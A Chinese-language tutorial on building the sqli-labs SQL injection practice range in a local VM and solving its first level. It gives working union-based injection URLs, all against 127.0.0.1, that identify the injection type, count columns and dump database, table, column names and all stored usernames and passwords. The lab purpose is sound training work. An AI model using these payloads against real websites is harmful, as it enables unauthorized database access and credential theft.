关于SQL注入靶场搭建及过关教程

关于SQL注入靶场搭建及过关教程

1.需要环境：
下载安装VMware，在虚拟机上布置虚拟机win7或winXP（个人推荐win7，使用界面与现在的win10界面较为相似，使用起来比较舒适）
Win7镜像下载地址：https://msdn.itellyou.cn/

2.需要工具：
PHPstudy，下载地址：https://www.xp.cn/download.html

SQL靶场，下载地址： https://pan.baidu.com/s/1yrIJmkREIuaiB7E1Z3ROpA 提取码: 772u
3.靶场搭建：
在虚拟机上安装好win7镜像后，进入操作界面，在浏览器上下载PHPstudy，选择2016的版本即可。安装时默认路径是英文名，打开它的目录，里面会有一个www的文件夹，然后将下载的SQL靶场文件放入该文件夹里。
启动PHPstudy，打开浏览器，在浏览器网址栏输入http://127.0.0.1/sqli-labs-master（或者在命令行界面查找本机ip，输入http:///sqli-labs-master，也可以）然后回车，进入以下界面就代表靶场搭建成功了！！

4.第一关过关教程：
1）判断整型注入还是字符型注入
http://127.0.0.1/sqli-labs-master/Less-1/?id=1 正常
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ 异常
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ --+ 正常
由此可以判断这一关是字符型注入

2）判断字段数（这一步很关键）
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ order by 3 --+ 正常
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ order by 4 --+ 异常
由此判断字段数为3

3）爆数据库名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,database(),3 --+
id=-1，表示不让第一个SQL语句输出内容，重点在于后面联合查询的database()函数，该函数用于输出数据库名。
由此查询到数据库名为security

4）爆表名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=‘security’),3 --+
这一条URL与上一句爆库名的相比，用了一句较长的SQL语句代替了database（）函数。
了解这条语句之前我们首先要知道，在MySQL5.0版本之后里面有一个默认的数据库叫做information_schema，里面含有三个表，schemata：记录了服务器上所有数据库名；tables：含有两个字段，table_schema记录数据库名，table_name：记录每个数据库含有的表名；columns：含有三个字段，table_schema，table_name，column_name：记录了每个表的字段名。
知道这些上面的SQL语句就很好理解了，就是从名为security的数据库中取出它所含有的表名
由此可查询到表名为，emails,referers,uagents,users这四个表

5）爆字段名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=‘security’ and table_name=‘users’),3 --+
这一句与上面语句差不多，可以按照上面思路去自己理解一下
由此可查询到字段名，id，username，password

6）爆数据
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(id,username,password)from users),3 --+
最终爆出该表的全部用户名和密码
第一关就完成啦！！！